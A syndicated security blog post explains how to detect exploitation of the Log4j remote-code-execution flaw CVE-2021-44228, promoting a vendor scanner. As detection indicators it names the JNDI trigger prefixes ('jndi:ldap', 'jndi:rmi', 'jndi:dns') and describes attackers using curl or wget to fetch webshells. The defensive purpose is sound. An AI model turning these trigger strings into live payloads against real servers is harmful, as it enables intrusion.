Security Bloggers Network 
SBN

Log4j Exploit Detection (CVE-2021-44228)

Avatar photo by Chris Gerritz on December 11, 2021

If you are reading this than I assume you have already heard about CVE-2021-44228, the Remote Code Execution (RCE) vulnerability affecting Apache Log4j, the Java logging library much of the internet uses on their web servers. While many blogs and comments have posted methods to determine if your web servers / websites are vulnerabe, there is limited info on how to easily detect if your web server has indeed been exploited and infected. But first, a quick synopsys:

CVE-2021-44228 Apache Log4j RCE

  • First, as most of twitter and security experts are saying: this vulnerability is bad. Real bad. A lot of prominant websites run this logger.
  • RCE = Remote Code Execution. The attacker can run whatever code (e.g. malware) they want on your webserver by sending a web request to your website with nothing more than a “magic” string + a link to the code they want to run.
  • Affects Apache web server using vulnerable versions of the log4j logger (the most popular java logging module for websites running java).
  • Vulnerable versions: 2.0 – 2.14.1

Has anyone tried to exploit my web server?

Typical behaviors to expect if your server is exploited by an attacker is the installation of a new webshell (website malware that gives admin access to the server via a hidden administrator interface). Apache would run curl or wget commands to pull down the webshell or other malware they wanted to install.

Luckily, there are a couple ways to detect exploit attempts while monitoring the server and uncover previous exploit attempts:

  1. Review apache logs for `jndi:ldap`, `jndi:rmi` or `jndi:dns`. These are the magic strings that cause the logger to go haywire and follow/execute the url that follows it.
  2. Scan /var/log with yara signatures matching some of these indicators
  3. Scan the webserver for generic webshells
  4. If you have EDR on the web server, monitor for suspicious curl, wget, or related commands. Likely the code they try to run first following exploitation has the system reaching out to the command and control server using built-in utilities like this.

NOTE: If the server is exploited by automated scanners (good guys are running these), it’s possible you could get an indicator of exploitation without follow-on malware or webshells. Some research scanners exploit the vulnerability and have the system send out a single ping or dns request to inform the researcher of who was vulnerable.

Infocyte log4j Scanner Extention

Infocyte has published a log4j scanner that conducts the tasks above. Run it on linux servers to identify evidence of exploition or compromise. Note: This scanner is under continuing development so check back daily this week for any updates as the community learns more.

Don’t hesitate to reach out to the Infocyte team for help.

Good Hunting!

The post Log4j Exploit Detection (CVE-2021-44228) appeared first on Infocyte.

*** This is a Security Bloggers Network syndicated blog from Blog – Infocyte authored by Chris Gerritz. Read the original post at: https://www.infocyte.com/blog/2021/12/11/log4j-exploit-detection-cve-2021-44228/

Chris Gerritz
Avatar photo

Chris Gerritz

Chris is a retired Air Force cybersecurity officer and veteran who pioneered defensive cyber threat hunting operations for the U.S. Air Force — standing up their first interactive Defensive Counter Cyberspace (DCC) practice.

chris-gerritz has 12 posts and counting.See all posts by chris-gerritz